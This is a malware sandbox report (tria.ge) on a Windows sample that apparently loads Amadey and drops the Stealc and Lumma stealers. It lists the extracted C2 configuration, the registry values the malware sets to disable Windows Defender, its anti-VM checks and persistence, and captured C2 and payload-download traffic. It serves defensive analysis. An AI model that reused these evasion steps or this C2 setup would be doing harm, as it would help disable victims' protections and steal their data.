Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08/11/2024, 03:04 UTC
Static task
static1
Behavioral task
behavioral1
Sample
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Resource
win7-20240903-en
General
-
Target
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
-
Size
3.1MB
-
MD5
74ba48529515c95320f4a86fc42fc668
-
SHA1
c33b2b0c5e43e5ac274206ae964cf85bb8718048
-
SHA256
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa
-
SHA512
16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8
-
SSDEEP
98304:XmP6PUaaDfBgWBPTrdEdsgxYC2JyLce9ebFyZgk6TR:XcqZexyV6T
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
tale
http://185.215.113.206
-
url_path
/6c4adf523b719729.php
Extracted
lumma
https://founpiuer.store/api
Signatures
-
Amadey family
-
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 5685e027dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 5685e027dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 5685e027dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 5685e027dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 5685e027dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 5685e027dd.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 71b8acff7f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e1ae7b97ca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5685e027dd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e1ae7b97ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5685e027dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 71b8acff7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 71b8acff7f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e1ae7b97ca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5685e027dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation skotes.exe -
Executes dropped EXE 7 IoCs
pid Process 2628 skotes.exe 2748 skotes.exe 1296 71b8acff7f.exe 3740 e1ae7b97ca.exe 4252 5685e027dd.exe 3296 skotes.exe 1660 skotes.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine 71b8acff7f.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine e1ae7b97ca.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine 5685e027dd.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine skotes.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 5685e027dd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 5685e027dd.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\71b8acff7f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004745001\\71b8acff7f.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e1ae7b97ca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004746001\\e1ae7b97ca.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5685e027dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1004748001\\5685e027dd.exe" skotes.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 540 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 2628 skotes.exe 2748 skotes.exe 1296 71b8acff7f.exe 3740 e1ae7b97ca.exe 4252 5685e027dd.exe 3296 skotes.exe 1660 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4572 1296 WerFault.exe 105 2896 1296 WerFault.exe 105 -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 71b8acff7f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e1ae7b97ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5685e027dd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 540 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 540 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 2628 skotes.exe 2628 skotes.exe 2748 skotes.exe 2748 skotes.exe 1296 71b8acff7f.exe 1296 71b8acff7f.exe 3740 e1ae7b97ca.exe 3740 e1ae7b97ca.exe 4252 5685e027dd.exe 4252 5685e027dd.exe 4252 5685e027dd.exe 4252 5685e027dd.exe 4252 5685e027dd.exe 3296 skotes.exe 3296 skotes.exe 1660 skotes.exe 1660 skotes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4252 5685e027dd.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 540 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 540 wrote to memory of 2628 540 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 88 PID 540 wrote to memory of 2628 540 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 88 PID 540 wrote to memory of 2628 540 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 88 PID 2628 wrote to memory of 1296 2628 skotes.exe 105 PID 2628 wrote to memory of 1296 2628 skotes.exe 105 PID 2628 wrote to memory of 1296 2628 skotes.exe 105 PID 2628 wrote to memory of 3740 2628 skotes.exe 107 PID 2628 wrote to memory of 3740 2628 skotes.exe 107 PID 2628 wrote to memory of 3740 2628 skotes.exe 107 PID 2628 wrote to memory of 4472 2628 skotes.exe 108 PID 2628 wrote to memory of 4472 2628 skotes.exe 108 PID 2628 wrote to memory of 4472 2628 skotes.exe 108 PID 2628 wrote to memory of 4252 2628 skotes.exe 114 PID 2628 wrote to memory of 4252 2628 skotes.exe 114 PID 2628 wrote to memory of 4252 2628 skotes.exe 114
Processes
-
C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"C:\Users\Admin\AppData\Local\Temp\766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe"C:\Users\Admin\AppData\Local\Temp\1004745001\71b8acff7f.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1296 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 14684⤵
- Program crash
PID:2896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1296 -s 15084⤵
- Program crash
PID:4572
-
-
-
C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe"C:\Users\Admin\AppData\Local\Temp\1004746001\e1ae7b97ca.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3740
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"3⤵PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe"C:\Users\Admin\AppData\Local\Temp\1004748001\5685e027dd.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1296 -ip 12961⤵PID:3584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1296 -ip 12961⤵PID:4652
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3296
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1660
Network
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request232.168.11.51.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request106.209.201.84.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request106.209.201.84.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request20.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:04:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:04:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:05:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:05:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.43:80RequestPOST /Zu7JuNko/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.43
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:05:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:185.215.113.16:80RequestGET /luma/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:05:00 GMT
Content-Type: application/octet-stream
Content-Length: 3152896
Last-Modified: Fri, 08 Nov 2024 02:43:37 GMT
Connection: keep-alive
ETag: "672d7ad9-301c00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /steam/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:05:26 GMT
Content-Type: application/octet-stream
Content-Length: 2158592
Last-Modified: Fri, 08 Nov 2024 02:43:50 GMT
Connection: keep-alive
ETag: "672d7ae6-20f000"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /off/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 03:05:36 GMT
Content-Type: application/octet-stream
Content-Length: 2828800
Last-Modified: Fri, 08 Nov 2024 02:26:35 GMT
Connection: keep-alive
ETag: "672d76db-2b2a00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request16.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request28.118.140.52.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request241.150.49.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Requestpresticitpo.storeIN AResponse
-
Remote address:8.8.8.8:53Requestcrisiwarny.storeIN AResponse
-
Remote address:8.8.8.8:53Requestfadehairucw.storeIN AResponse
-
Remote address:8.8.8.8:53Requestthumbystriw.storeIN AResponse
-
Remote address:8.8.8.8:53Requestthumbystriw.storeIN A
-
Remote address:8.8.8.8:53Requestnecklacedmny.storeIN A
-
Remote address:8.8.8.8:53Requestnecklacedmny.storeIN A
-
Remote address:8.8.8.8:53Requestnecklacedmny.storeIN A
-
Remote address:8.8.8.8:53Requestnecklacedmny.storeIN A
-
Remote address:8.8.8.8:53Requestnecklacedmny.storeIN A
-
Remote address:8.8.8.8:53Request18.31.95.13.in-addr.arpaIN PTRResponse
-
Remote address:185.215.113.206:80RequestGET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.206:80RequestPOST /6c4adf523b719729.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEH
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request206.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestfounpiuer.storeIN AResponsefounpiuer.storeIN A104.21.5.155founpiuer.storeIN A172.67.133.135
-
Remote address:8.8.8.8:53Requestfounpiuer.storeIN A
-
Remote address:8.8.8.8:53Requestfounpiuer.storeIN A
-
Remote address:8.8.8.8:53Requestfounpiuer.storeIN A
-
Remote address:8.8.8.8:53Request75.117.19.2.in-addr.arpaIN PTRResponse75.117.19.2.in-addr.arpaIN PTRa2-19-117-75deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request75.117.19.2.in-addr.arpaIN PTR
-
Remote address:104.21.5.155:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: founpiuer.store
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI%2FPT04%2FWP%2Bocu2N6gxCblweQnhVwYrt23yYjQU%2Frole4AvDddc6%2BdVpJiN5KNu79AbjZc7R1CrcvHBZWiw%2BgFNLyjnEf4veR1f2C6AK13qoKZI%2B%2F6tuMyATA4ACFwUqezI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8df257b27aebbda0-LHR
-
Remote address:104.21.5.155:443RequestPOST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=Hl5sv1NETPETgsrAnXBkc1LI.ccTVaYKai9EgCsvnsg-1731035138-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 52
Host: founpiuer.store
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=itv2q58qggv27129205rms8gdp; expires=Mon, 03-Mar-2025 20:52:18 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2s6fLTd07wIRITiCZUTxPBNXZr1%2FWaBZIi5qfgaCuzymsBWFvyL9cwyOHviHYeGbrV8idukv4I2Gg0iKWrL1ifYuV1j9Uo7FTgEJj%2FIHpSzYraiKAngzXEBPEft7COvQ1c%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8df257b32b57bda0-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49524&sent=14&recv=13&lost=0&retrans=0&sent_bytes=8460&recv_bytes=1065&delivery_rate=188472&cwnd=257&unsent_bytes=0&cid=a817319027210647&ts=383&x=0"
-
Remote address:8.8.8.8:53Request155.5.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.214.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request14.227.111.52.in-addr.arpaIN PTRResponse
-
2.8kB 3.7kB 27 19
HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200HTTP Request
POST http://185.215.113.43/Zu7JuNko/index.phpHTTP Response
200 -
279.5kB 8.4MB 6018 6010
HTTP Request
GET http://185.215.113.16/luma/random.exeHTTP Response
200HTTP Request
GET http://185.215.113.16/steam/random.exeHTTP Response
200HTTP Request
GET http://185.215.113.16/off/random.exeHTTP Response
200 -
957 B 745 B 10 8
HTTP Request
GET http://185.215.113.206/HTTP Response
200HTTP Request
POST http://185.215.113.206/6c4adf523b719729.phpHTTP Response
200 -
1.7kB 10.2kB 15 17
HTTP Request
POST https://founpiuer.store/apiHTTP Response
403HTTP Request
POST https://founpiuer.store/apiHTTP Response
200
-
132 B 90 B 2 1
DNS Request
8.8.8.8.in-addr.arpa
DNS Request
8.8.8.8.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
232.168.11.51.in-addr.arpa
-
146 B 133 B 2 1
DNS Request
106.209.201.84.in-addr.arpa
DNS Request
106.209.201.84.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
20.160.190.20.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
73 B 133 B 1 1
DNS Request
43.113.215.185.in-addr.arpa
-
73 B 133 B 1 1
DNS Request
16.113.215.185.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
288 B 158 B 4 1
DNS Request
28.118.140.52.in-addr.arpa
DNS Request
28.118.140.52.in-addr.arpa
DNS Request
28.118.140.52.in-addr.arpa
DNS Request
28.118.140.52.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
360 B 158 B 5 1
DNS Request
241.150.49.20.in-addr.arpa
DNS Request
241.150.49.20.in-addr.arpa
DNS Request
241.150.49.20.in-addr.arpa
DNS Request
241.150.49.20.in-addr.arpa
DNS Request
241.150.49.20.in-addr.arpa
-
63 B 128 B 1 1
DNS Request
presticitpo.store
-
62 B 127 B 1 1
DNS Request
crisiwarny.store
-
63 B 128 B 1 1
DNS Request
fadehairucw.store
-
126 B 128 B 2 1
DNS Request
thumbystriw.store
DNS Request
thumbystriw.store
-
320 B 5
DNS Request
necklacedmny.store
DNS Request
necklacedmny.store
DNS Request
necklacedmny.store
DNS Request
necklacedmny.store
DNS Request
necklacedmny.store
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
74 B 134 B 1 1
DNS Request
206.113.215.185.in-addr.arpa
-
244 B 93 B 4 1
DNS Request
founpiuer.store
DNS Request
founpiuer.store
DNS Request
founpiuer.store
DNS Request
founpiuer.store
DNS Response
104.21.5.155172.67.133.135
-
140 B 133 B 2 1
DNS Request
75.117.19.2.in-addr.arpa
DNS Request
75.117.19.2.in-addr.arpa
-
